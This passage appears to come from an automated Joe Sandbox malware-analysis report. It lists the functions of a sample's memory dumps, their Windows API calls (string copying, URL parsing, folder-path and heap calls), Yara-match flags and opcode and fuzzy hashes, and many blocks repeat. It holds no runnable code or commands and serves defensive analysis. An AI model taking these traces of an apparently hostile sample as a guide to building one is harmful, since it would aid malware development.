                                                    • Instruction Fuzzy Hash: D701D4703047014BD7258A2CEE9062AB3F6DBD1704B24093EE1D2DB785DBB8EC828398
                                                    APIs
                                                    • lstrlen.KERNEL32(?,00000000,?), ref: 02484DA6
                                                    • InternetCrackUrlA.WININET(?,00000000), ref: 02484DAE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CrackInternetlstrlen
                                                    • String ID: <
                                                    • API String ID: 1274457161-4251816714
                                                    • Opcode ID: c02e02a012b36fed2c74b04be6013df41c29549af876b812a53909887fa019d5
                                                    • Instruction ID: ce3a05229dc7410b44c2ef344fdf29a6597125834edd2db07cc00820841023eb
                                                    • Opcode Fuzzy Hash: c02e02a012b36fed2c74b04be6013df41c29549af876b812a53909887fa019d5
                                                    • Instruction Fuzzy Hash: 56011B71D00218AFDB10DFA9EC44B9EBBA9AB08360F00412AF954E7390EB7459058FD0
                                                    APIs
                                                      • Part of subcall function 024A4287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 024A42B4
                                                      • Part of subcall function 024A4287: lstrcpy.KERNEL32(00000000,?), ref: 024A42E9
                                                      • Part of subcall function 024A7557: lstrcpy.KERNEL32(00000000), ref: 024A7586
                                                      • Part of subcall function 024A7557: lstrcat.KERNEL32(00000000), ref: 024A7592
                                                      • Part of subcall function 024A75A7: lstrlen.KERNEL32(------,02485D82), ref: 024A75B2
                                                      • Part of subcall function 024A75A7: lstrcpy.KERNEL32(00000000), ref: 024A75D6
                                                      • Part of subcall function 024A75A7: lstrcat.KERNEL32(?,------), ref: 024A75E0
                                                      • Part of subcall function 024A7517: lstrcpy.KERNEL32(00000000), ref: 024A7545
                                                      • Part of subcall function 024A4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024A40AC
                                                      • Part of subcall function 024A4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 024A40D6
                                                      • Part of subcall function 024A4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02481495,?,0000001A), ref: 024A40E0
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249C5B2
                                                    • lstrcat.KERNEL32(00000000), ref: 0249C5BC
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249C5EA
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0249C629
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
                                                    • String ID:
                                                    • API String ID: 2910713533-0
                                                    • Opcode ID: 5196f8d7d8ffbf8b536d13f2c8f0d4bd6a1504af06b38276e959285185f57b7a
                                                    • Instruction ID: dbc138cc8ef176b12084dbf7f3458f14646e16706f78f70f6c746e668b08dc98
                                                    • Opcode Fuzzy Hash: 5196f8d7d8ffbf8b536d13f2c8f0d4bd6a1504af06b38276e959285185f57b7a
                                                    • Instruction Fuzzy Hash: F6315C71D102A5ABCF21EFA5CC84B9EBBB6AF48308F14446BD405AB251DB74DE82DF50
                                                    APIs
                                                      • Part of subcall function 024A4287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 024A42B4
                                                      • Part of subcall function 024A4287: lstrcpy.KERNEL32(00000000,?), ref: 024A42E9
                                                      • Part of subcall function 024A7557: lstrcpy.KERNEL32(00000000), ref: 024A7586
                                                      • Part of subcall function 024A7557: lstrcat.KERNEL32(00000000), ref: 024A7592
                                                      • Part of subcall function 024A75A7: lstrlen.KERNEL32(------,02485D82), ref: 024A75B2
                                                      • Part of subcall function 024A75A7: lstrcpy.KERNEL32(00000000), ref: 024A75D6
                                                      • Part of subcall function 024A75A7: lstrcat.KERNEL32(?,------), ref: 024A75E0
                                                      • Part of subcall function 024A7517: lstrcpy.KERNEL32(00000000), ref: 024A7545
                                                      • Part of subcall function 024A4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024A40AC
                                                      • Part of subcall function 024A4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 024A40D6
                                                      • Part of subcall function 024A4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02481495,?,0000001A), ref: 024A40E0
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249C5B2
                                                    • lstrcat.KERNEL32(00000000), ref: 0249C5BC
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249C5EA
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0249C629
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
                                                    • String ID:
                                                    • API String ID: 2910713533-0
                                                    • Opcode ID: c3a13b43bfbb22c5b3688386ed9a797ab2b2dd583fad0e3a56070e27306dfb91
                                                    • Instruction ID: 45304ce757bfe812b3c6fbdd4643d22b08f8bc11cb6ffd5149eee6a25d2fe10c
                                                    • Opcode Fuzzy Hash: c3a13b43bfbb22c5b3688386ed9a797ab2b2dd583fad0e3a56070e27306dfb91
                                                    • Instruction Fuzzy Hash: CB314E71D102A5ABCF21EFB5CC84A9EBBB2AF48308F14446BD805AB651EB74DD42DF50
                                                    APIs
                                                      • Part of subcall function 024A4287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 024A42B4
                                                      • Part of subcall function 024A4287: lstrcpy.KERNEL32(00000000,?), ref: 024A42E9
                                                      • Part of subcall function 024A7557: lstrcpy.KERNEL32(00000000), ref: 024A7586
                                                      • Part of subcall function 024A7557: lstrcat.KERNEL32(00000000), ref: 024A7592
                                                      • Part of subcall function 024A75A7: lstrlen.KERNEL32(------,02485D82), ref: 024A75B2
                                                      • Part of subcall function 024A75A7: lstrcpy.KERNEL32(00000000), ref: 024A75D6
                                                      • Part of subcall function 024A75A7: lstrcat.KERNEL32(?,------), ref: 024A75E0
                                                      • Part of subcall function 024A7517: lstrcpy.KERNEL32(00000000), ref: 024A7545
                                                      • Part of subcall function 024A4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024A40AC
                                                      • Part of subcall function 024A4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 024A40D6
                                                      • Part of subcall function 024A4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02481495,?,0000001A), ref: 024A40E0
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249C5B2
                                                    • lstrcat.KERNEL32(00000000), ref: 0249C5BC
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249C5EA
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0249C629
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
                                                    • String ID:
                                                    • API String ID: 2910713533-0
                                                    • Opcode ID: ea4b98e16ecb482ecbdb8514f55abeb370371b626d7f48b9f57da31b4db55f9c
                                                    • Instruction ID: 4f735c7f73f8653c41886299a0ed15c85a4b61f063b5d006074d5a608305177c
                                                    • Opcode Fuzzy Hash: ea4b98e16ecb482ecbdb8514f55abeb370371b626d7f48b9f57da31b4db55f9c
                                                    • Instruction Fuzzy Hash: 4C315E71E102A4ABCF21EFA5CC84B9EBBB2AF49308F14446BD405A7251DB74DD42DF50
                                                    APIs
                                                      • Part of subcall function 024A4287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 024A42B4
                                                      • Part of subcall function 024A4287: lstrcpy.KERNEL32(00000000,?), ref: 024A42E9
                                                      • Part of subcall function 024A7557: lstrcpy.KERNEL32(00000000), ref: 024A7586
                                                      • Part of subcall function 024A7557: lstrcat.KERNEL32(00000000), ref: 024A7592
                                                      • Part of subcall function 024A75A7: lstrlen.KERNEL32(------,02485D82), ref: 024A75B2
                                                      • Part of subcall function 024A75A7: lstrcpy.KERNEL32(00000000), ref: 024A75D6
                                                      • Part of subcall function 024A75A7: lstrcat.KERNEL32(?,------), ref: 024A75E0
                                                      • Part of subcall function 024A7517: lstrcpy.KERNEL32(00000000), ref: 024A7545
                                                      • Part of subcall function 024A4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024A40AC
                                                      • Part of subcall function 024A4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 024A40D6
                                                      • Part of subcall function 024A4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02481495,?,0000001A), ref: 024A40E0
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249C5B2
                                                    • lstrcat.KERNEL32(00000000), ref: 0249C5BC
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249C5EA
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0249C629
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
                                                    • String ID:
                                                    • API String ID: 2910713533-0
                                                    • Opcode ID: c119ec92df3871871dffaf0474d1d7a138caf980c1379f325d92db08c09d55e7
                                                    • Instruction ID: de5c973724f1b1f9865c1f17bb32b48d5339ffdd427f5e1e8b333af0facf990a
                                                    • Opcode Fuzzy Hash: c119ec92df3871871dffaf0474d1d7a138caf980c1379f325d92db08c09d55e7
                                                    • Instruction Fuzzy Hash: A0314971E102A4ABCF21EFB5CC84B9EBBB2AF48308F14446BD405AB651DB74DA42DF50
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000), ref: 00421581
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 004215B9
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 004215F1
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00421629
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy
                                                    • String ID:
                                                    • API String ID: 3722407311-0
                                                    • Opcode ID: 7249e6668abafaf4035fa494e08afe422198d967ac41c3c40e0ecb1d77fcd613
                                                    • Instruction ID: 80d308abde563585a592328bb7eba962bc113a2ea9b505a2ad5a72594fb3347d
                                                    • Opcode Fuzzy Hash: 7249e6668abafaf4035fa494e08afe422198d967ac41c3c40e0ecb1d77fcd613
                                                    • Instruction Fuzzy Hash: EE211EB4701B029BD724DF3AD958A17B7F5BF54700B444A2EA486D7BA0DB78F840CBA4
                                                    APIs
                                                      • Part of subcall function 00401510: lstrcpy.KERNEL32(00000000), ref: 0040152D
                                                      • Part of subcall function 00401510: lstrcpy.KERNEL32(00000000,?), ref: 0040154F
                                                      • Part of subcall function 00401510: lstrcpy.KERNEL32(00000000,?), ref: 00401571
                                                      • Part of subcall function 00401510: lstrcpy.KERNEL32(00000000,?), ref: 00401593
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00401437
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00401459
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0040147B
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 004014DF
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy
                                                    • String ID:
                                                    • API String ID: 3722407311-0
                                                    • Opcode ID: bea906036c5024bdad2b439cbe047c88e0159a543058b9686e88131c65337636
                                                    • Instruction ID: 368a80f0553ecf631160e054036b62fbe6d7ddfceb8bd69434bdfc69ba453b92
                                                    • Opcode Fuzzy Hash: bea906036c5024bdad2b439cbe047c88e0159a543058b9686e88131c65337636
                                                    • Instruction Fuzzy Hash: 4A31A575A01B029FC728DF3AD588957BBE5BF48704700492EA956D3BA0DB74F811CB94
                                                    APIs
                                                      • Part of subcall function 02481777: lstrcpy.KERNEL32(00000000), ref: 02481794
                                                      • Part of subcall function 02481777: lstrcpy.KERNEL32(00000000,?), ref: 024817B6
                                                      • Part of subcall function 02481777: lstrcpy.KERNEL32(00000000,?), ref: 024817D8
                                                      • Part of subcall function 02481777: lstrcpy.KERNEL32(00000000,?), ref: 024817FA
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0248169E
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 024816C0
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 024816E2
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02481746
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy
                                                    • String ID:
                                                    • API String ID: 3722407311-0
                                                    • Opcode ID: adf978454c3d5bdd2a26ceaf3544a8e4f67307e827b9ebe409f1eb4b0b822894
                                                    • Instruction ID: bf7a309240cc7a19446bab8b523a3f1b8bc64b2b2f78fd06ae282474dc94546d
                                                    • Opcode Fuzzy Hash: adf978454c3d5bdd2a26ceaf3544a8e4f67307e827b9ebe409f1eb4b0b822894
                                                    • Instruction Fuzzy Hash: A8311474A21B42AFD724EF3AC98891BB7E5BF48704704092E989AD3B10DB70F411CF90
                                                    APIs
                                                      • Part of subcall function 02481777: lstrcpy.KERNEL32(00000000), ref: 02481794
                                                      • Part of subcall function 02481777: lstrcpy.KERNEL32(00000000,?), ref: 024817B6
                                                      • Part of subcall function 02481777: lstrcpy.KERNEL32(00000000,?), ref: 024817D8
                                                      • Part of subcall function 02481777: lstrcpy.KERNEL32(00000000,?), ref: 024817FA
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0248169E
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 024816C0
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 024816E2
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02481746
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy
                                                    • String ID:
                                                    • API String ID: 3722407311-0
                                                    • Opcode ID: 171f9c098ff936ecfc8a21f2e49e70ffbd26c7e9154b77e38915ce96a98a388b
                                                    • Instruction ID: a521fb17a83e75129b6b6d48242b4093ab9e67d98ccb41159915721e83b40492
                                                    • Opcode Fuzzy Hash: 171f9c098ff936ecfc8a21f2e49e70ffbd26c7e9154b77e38915ce96a98a388b
                                                    • Instruction Fuzzy Hash: 0A311474A21B42AFD724EF3AC98895BBBE5BF48704704092E989AC3B10DB70F411CF90
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000), ref: 024A17E8
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 024A1820
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 024A1858
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 024A1890
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy
                                                    • String ID:
                                                    • API String ID: 3722407311-0
                                                    • Opcode ID: 7ae04f7c6e936abb9121da055da54f732691e094f676fb8c019d3dd63920e58b
                                                    • Instruction ID: 6a685155aead467289340dcee735287366ffc293aaab0bb63e249f5b8abee4dd
                                                    • Opcode Fuzzy Hash: 7ae04f7c6e936abb9121da055da54f732691e094f676fb8c019d3dd63920e58b
                                                    • Instruction Fuzzy Hash: B621F9B4601B429BD734EF3AC9A8A1BB7E5AF54304B14491ED89EC7B40EB74E441CFA0
                                                    APIs
                                                      • Part of subcall function 024A75A7: lstrlen.KERNEL32(------,02485D82), ref: 024A75B2
                                                      • Part of subcall function 024A75A7: lstrcpy.KERNEL32(00000000), ref: 024A75D6
                                                      • Part of subcall function 024A75A7: lstrcat.KERNEL32(?,------), ref: 024A75E0
                                                      • Part of subcall function 024A7517: lstrcpy.KERNEL32(00000000), ref: 024A7545
                                                      • Part of subcall function 024A4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024A40AC
                                                      • Part of subcall function 024A4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 024A40D6
                                                      • Part of subcall function 024A4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02481495,?,0000001A), ref: 024A40E0
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249C5B2
                                                    • lstrcat.KERNEL32(00000000), ref: 0249C5BC
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249C5EA
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0249C629
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$SystemTimelstrlen
                                                    • String ID:
                                                    • API String ID: 3486790982-0
                                                    • Opcode ID: 51ee759836b56bbb9668dab7b2b627ac7de2a18087f825893ee7e7dc6d6dc0d3
                                                    • Instruction ID: 29f406a5058da54c0241f54da465f9602c2a3fa14bef30afebaa624f018bb2cb
                                                    • Opcode Fuzzy Hash: 51ee759836b56bbb9668dab7b2b627ac7de2a18087f825893ee7e7dc6d6dc0d3
                                                    • Instruction Fuzzy Hash: 9D216D71D10295ABCF21EFB5CCC8AAEBBB6AF48309F14446BD401AB251EB74D941DF90
                                                    APIs
                                                    • memcpy.MSVCRT(?,?,00000040), ref: 00406E40
                                                    • memcpy.MSVCRT(?,00005A4D,000000F8), ref: 00406E7C
                                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 00406EB4
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00406EBB
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heapmemcpy$AllocProcess
                                                    • String ID:
                                                    • API String ID: 1643994569-0
                                                    • Opcode ID: 0f7b886846e76426d6cbee1e2efefd49dca9b7f6cc258be776eaadaa1a2d8544
                                                    • Instruction ID: 021ca828da5bfa0a796bb6e6c33eee2a11837a2b1fb4363adf8c912b1a52eb88
                                                    • Opcode Fuzzy Hash: 0f7b886846e76426d6cbee1e2efefd49dca9b7f6cc258be776eaadaa1a2d8544
                                                    • Instruction Fuzzy Hash: 9A218CB06007029BEB248B21DC84BBB73E8EB40704F44447DEA47DB684EBB8E951CB95
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000), ref: 0040152D
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0040154F
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00401571
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00401593
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy
                                                    • String ID:
                                                    • API String ID: 3722407311-0
                                                    • Opcode ID: 1e4db7d30871f81d580a612b99273a05910c7c6a33be4731b3f5a86597217395
                                                    • Instruction ID: 156e9cd4061fd8f5e73776b1d1d3add2ecf4c06161da7b3eeeca5abdbe74678b
                                                    • Opcode Fuzzy Hash: 1e4db7d30871f81d580a612b99273a05910c7c6a33be4731b3f5a86597217395
                                                    • Instruction Fuzzy Hash: 86111275A01B02ABDB14AF36D95C927B7F8BF44305304463EA457E7B90EB78E800CB94
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000), ref: 02481794
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 024817B6
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 024817D8
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 024817FA
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy
                                                    • String ID:
                                                    • API String ID: 3722407311-0
                                                    • Opcode ID: 4ad754671c24d071af27ddad61fabe380e7e2885a874112eec80ea100ea8e3f1
                                                    • Instruction ID: b7d2c20dfe829a0f8c63cf139b72e119188cef6da57873ab64bd694e6c5a193c
                                                    • Opcode Fuzzy Hash: 4ad754671c24d071af27ddad61fabe380e7e2885a874112eec80ea100ea8e3f1
                                                    • Instruction Fuzzy Hash: A611EF74A21B42ABD724BF36D85892BB7F9BF446457044A2F985EC3B40EB74E441CFA0